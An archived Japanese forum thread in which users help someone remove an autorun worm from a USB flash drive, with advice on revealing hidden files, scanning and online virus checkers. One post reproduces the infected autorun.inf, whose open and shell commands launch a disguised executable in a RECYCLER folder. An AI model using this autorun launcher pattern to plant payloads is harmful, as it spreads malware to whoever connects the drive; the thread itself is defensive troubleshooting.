全ファイル表示の設定にしても表示されません。
駆除する方法はないでしょうか?
それとも、
最終的にはフラッシュメモリの中の必要なファイルだけ別に保存して、
フォーマットする、とかしかないでしょうか?
111:名無しさん@お腹いっぱい。
08/06/23 15:57:30
>>110
自動再生(差し込むとマイコンピューターが開く)設定してた?
112:110
08/06/23 16:00:22
>>111
してません。
と、いうよりそういう設定自体を知りませんでした。
113:名無しさん@お腹いっぱい。
08/06/23 16:00:58
>>110
OK
ならここを読んでください。
中ほどに対処方法がかかれてます。
URLリンク(www.ipa.go.jp)
114:名無しさん@お腹いっぱい。
08/06/23 16:03:44
Autorun.inf を削除したあとは、
USBメモリをスキャンしてみてください
コレで駆除できればいいけど……
115:名無しさん@お腹いっぱい。
08/06/23 16:11:33
それじゃ削除できないんじゃないか?
116:名無しさん@お腹いっぱい。
08/06/23 16:19:15
>>113-114
ありがとうございます。
前述したようにアンチソフトでは検出はできますが駆除ができません。
エクスプローラー上で探せ、とそのサイトにはありますが、
やはりautorun.infというファイルが見当たりません。
う〜ん。
117:名無しさん@お腹いっぱい。
08/06/23 16:22:52
いや>>114は間違い。
削除しちゃうとだめだったから、それでよかったよ。
118:110
08/06/23 16:23:40
ちなみに、avastの表示によると、
マルウェアの名称はVBS:Malware-gen
VPSバージョンは080623-0,2008/6/23
となってます。
119:名無しさん@お腹いっぱい。
08/06/23 16:30:07
autorun.infそのものはウィルスじゃなくて
ウィルスを自動起動させるための罠。
(表示されない)
[フォルダオプション]で
(全てのファイルを表示)にチェック
あと、一番下にある
(保護されたオペレーティング〜表示しない)のチェックを外す
コレでautorun.infが在るかどうかだけ見てみては?
削除しないで。
120:名無しさん@お腹いっぱい。
08/06/23 16:36:32
>>119
ありがとうございます。
最後の「保護された〜」を処置してませんでした、
外したら、ファイルを目視できました。
とりあえず、ここまではクリアできましたが、
駆除するにはどうすればよいのでしょう?
ただ、これが起動させるためだけのものだとすると、
ウィルス本体はHDD内にあったりするのでしょうか?
121:名無しさん@お腹いっぱい。
08/06/23 16:46:27
>>120
じゃ、続いてコレを……多分対応は出来るんじゃないだろうか
URLリンク(www.mnc.toho-u.ac.jp)
>ウィルス本体はHDD内にあったりするのでしょうか?
AVSTがブロックしてたらまだUSB内にあると思うけど……
念のため改めてフルスキャンしてみてください。
一応VBS:Malware-genは誤検知もあるってな事が書かれてます。
情報は古いんですが
URLリンク(okwave.jp)
122:121
08/06/23 16:47:43
あ、手動削除の説明はPDFです。
123:名無しさん@お腹いっぱい。
08/06/23 17:13:43
>>121
ありがとうございます。
当該ファイルをNotepadで開く、
*****.exeの記述がある行を削除して上書き
その記述にあったフォルダを削除
と、やってみました。
これで、一旦は消えるのですがすぐにまた再生されてしまいます。
と、いうことは、こいつらを作成するウィルスがどこか他所にある???
ってことでしょうか・・・
124:名無しさん@お腹いっぱい。
08/06/23 17:16:20
でしょうな。
125:名無しさん@お腹いっぱい。
08/06/23 17:18:36
とりあえずフルスキャンを。
126:名無しさん@お腹いっぱい。
08/06/23 17:27:01
2度目のフルスキャン中です。
とりあえず、
Cドラのavast→DATA→movedフォルダ内にautorun2というのがみつかったのでチェスト行きにしました。
127:110
08/06/23 18:00:32
フラッシュメモリ内にトロイが検出されましたが、
avasutがこれに対して無力で、「処置できない。」となります。
これはフォルダごと「削除」、ではダメなんでしょうか?
128:名無しさん@お腹いっぱい。
08/06/23 18:09:08
(*´●`)ノ゙
129:名無しさん@お腹いっぱい。
08/06/23 18:30:35
>>110
とりあえず消してみるしかないんじゃないだろうか。
130:名無しさん@お腹いっぱい。
08/06/23 18:33:42
削除できれば良いんだが……また復活しないかな
削除したあとも念のため>>121の手順をもう一度実行して様子見てください。
メモリじゃなくてPCに潜んでるとやっかいだな。
131:名無しさん@お腹いっぱい。
08/06/23 18:54:27
フォーマットしても消えないの?
132:名無しさん@お腹いっぱい。
08/06/23 19:27:42
出来れば消したくないということじゃないのか?
133:名無しさん@お腹いっぱい。
08/06/23 19:42:04
shitキーを押しながらUSBメモリを繋げばオートランは機能しないけど
これじゃ防げないの?
ウイルスじゃ防げるわけないか・・・・・・・・
134: ◆N9P3SuvBPo
08/06/23 20:09:56
>当該ファイルをNotepadで開く、
>*****.exeの記述がある行を削除して上書き
>その記述にあったフォルダを削除
>
>と、やってみました。
>これで、一旦は消えるのですがすぐにまた再生されてしまいます。
…削除してもすぐ復活するんですね。(そのファイルとその*****.exeの記述が)
autorun.infに記述されている*****.exeをフルパスで教えてもらえないですか?
さらに*****.exeを1つずつURLリンク(www.virustotal.com)で調べて、結果を教えてもらえませんか?
後…
>avastがUSBフラッシュメモリに反応
とありますが、フラッシュメモリをUSBポートに挿し込んだ瞬間に反応したと言う事でしょうか?
>最終的にはフラッシュメモリの中の必要なファイルだけ別に保存して、
>フォーマットする、とかしかないでしょうか?
フラッシュメモリのデータは諦めた方が良いかも知れません。
最悪の場合、リカバリという決断を下します。
135:名無しさん@お腹いっぱい。
08/06/23 20:19:10
USBメモリをフォーマットするのが一番簡単な解決方法だと思うけど
136:名無しさん@お腹いっぱい。
08/06/23 20:54:13
>>128
>>134
(ο^д^)ノシ
137: ◆N9P3SuvBPo
08/06/23 20:59:56
>136
(〆^д^)ノシ
138:110
08/06/23 21:01:37
>>130
トロイとして認識されたファイルのフォルダは復活してませんが、
結局、またautorunが作られました。
>>131
最終的にはそれしかないでしょうか、
できれば避けたいので、
>>134
ありがとうございます。
[autorun]
open=RECYCLER\[エス]-1-5-21-1482476501-1644491937-682003330-1013
\[アイエスイー]32.exe
icon=%SystemRoot%\system32
\SHELL32.dll,4
action=Open folder to view files
shell
\open=Open
shell\open\command=RECYCLER\[エス]-1-5-21-1482476501-1644491937-682003330-1013
\[アイエスイー]32.exe
shell\open\default=1
以上がautorunに書かれたコマンドです、
よくわかりませんが、念の為、アルファベット部分を[カナ]に変えてます。
ただ、ご紹介いただいたサイトはうちからではなぜか非表示になるので、
今のところエグゼファイルを調べるのは今は難しいです。
avasutが反応するのはおっしゃるっとり、ポートに差し込んだ時点でです。
139:110
08/06/23 21:08:38
あと、
すべてのドライブにRECYCLERという隠しフォルダが作られており、
中には
S-1-5-21-***********-***********-*****
という隠しファイルが複数あります。
うち、Cドライブには、フラッシュのコマンドが指定したエグゼファイルと同一のものがあります。
あと、このファイルはサイズが表示されず、アイコンと種類がごみ箱、
とフォルダの中では表示されてます。
140:名無しさん@お腹いっぱい。
08/06/23 21:09:08
>>110
↓CCCクリーナ、これお薦め
税金で出来てるしww
URLリンク(www.ccc.go.jp)
Avast!より
Aviraとか、AVGに換えたほうが良い
141: ◆N9P3SuvBPo
08/06/23 21:23:37
>138
これってごみ箱開いたらアウトなんじゃねーの?(って遅かったか…)
>非表示
ってことはページが表示できませんって奴?
もしかしてURLリンク(www.kaspersky.co.jp)も開けませんか?
ポートに挿し込んだ時点で反応したなら、なんとか大丈夫だと思ったんですが。
>S-1-5-21-***********-***********-*****
元からある奴なので問題ありません。
問題なのはその中にある問題のexeファイルです。
やっぱりアウトルン系ウイルスは…何かと厄介ですね。
142: ◆N9P3SuvBPo
08/06/23 21:31:10
っていうかこれ多分俺のミスかも
(「指示したこと以外のことはしないように」と言わなかったから)
143:名無しさん@お腹いっぱい。
08/06/23 21:44:34
>>141
ごみ箱自体は触ってません。
コマンドは>>121さんに紹介していただいた方法で開いてるので大丈夫なのでは?
そちらのサイトはつながりました。
RYCYCLEフォルダ自体はデフォであるフォルダなのですね。
で、Cドラと、フラッシュに作られてる1482476501-のエグゼが問題と、
>>140
今後の参考にさせていただきます。ありがとうございました。
144: ◆N9P3SuvBPo
08/06/23 21:54:18
>143
でも、RECYCLERという名前のフォルダは開いたんですよね。
カスペのサイトに繋がったのなら、
オンラインスキャナ→カスペルスキーファイルスキャナで
その問題のexeファイルを調べてください。
>コマンドは>>121さんに紹介していただいた方法で開いてるので大丈夫なのでは?
たぶん大丈夫だと思います…。
145:110
08/06/23 22:02:55
>>144
やってみましたが、
「スキャンするファイルをもう一度入力してください 」
これが繰りけされつづけます・・・
146: ◆N9P3SuvBPo
08/06/23 22:13:16
>145
出来ないんですか…
なんとかして正体知りたいんだけど(ほんとならvirustotalが開くことが出きれば良いのだが)
どうしよう…
他の人にバトン渡しても宜しいでしょうか?
眠い…
147:名無しさん@お腹いっぱい。
08/06/23 22:26:55
>>145
Fatrexというソフトがある。(インスコしないでもつかえる。)
これはシステムフォルダ内のファイル+(拡張子)も見ることができる。
実行したことはないが問題のファイルをリネーム(Dd4.txt等)にしてみたらどうだろう。
148: ◆N9P3SuvBPo
08/06/23 22:39:09
後はお任せします。
おやすみなさい…(φー_ー)ノシ
149:八頭
08/06/23 23:24:16
>>110
ここらを試してみて
日本F-Secure株式会社 - 無償ウィルス検査(オンラインスキャナでウィルス・スパイウェアの駆除、削除ができます)
URLリンク(www.f-secure.co.jp)
a-squared Free 3.5 Free
URLリンク(www.emsisoft.com)
a-squared Emergency USB Stick Free
URLリンク(www.emsisoft.com)
Free版使用に際して、アカウントの作成を求められたら
Create new user account
URLリンク(www.emsisoft.com)
次ページ最新レス表示スレッドの検索類似スレ一覧話題のニュースおまかせリスト▼オプションを表示暇つぶし2ch
4801日前に更新/271 KB
担当:undef